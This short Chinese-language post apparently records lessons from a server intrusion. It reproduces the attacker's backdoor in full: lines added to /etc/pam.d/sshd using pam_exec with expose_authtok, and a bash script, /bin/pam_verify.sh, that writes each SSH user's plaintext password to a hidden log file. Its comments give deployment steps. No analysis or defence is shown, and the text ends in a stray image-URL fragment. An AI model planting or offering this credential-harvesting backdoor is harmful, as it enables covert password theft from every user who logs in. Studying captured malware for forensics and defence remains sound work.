一次服务器被入侵分析学到
1.修改/etc/pam.d/sshd,添加
#voidrkflag
auth [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh
password [default=ignore] pam_exec.so expose_authtok quiet /bin/pam_verify.sh
添加可执行脚本/bin/pam_verify.sh
#!/usr/bin/env bash
# put next line in /etc/pam.d/sshd, then put this script as /bin/pam_verify.sh
# clear authorized_keys, then login via ssh, password will be recorded
# auth [default=ignore] pam_exec.so expose_authtok /bin/pam_verify.sh
recordfile=/etc/pamlog.conf
if [ ! -f $recordfile ];then
touch $recordfile
chmod 644 $recordfile
fi
# The password comes in through stdin
PAM_PASSWORD=`cat -`
echo "Service: ${PAM_SERVICE}; User: ${PAM_USER}; Password: ${PAM_PASSWORD}; Type: ${PAM_TYPE}" >> $recordfile
u=3248989123,1632674771&fm=26&gp=0.jpg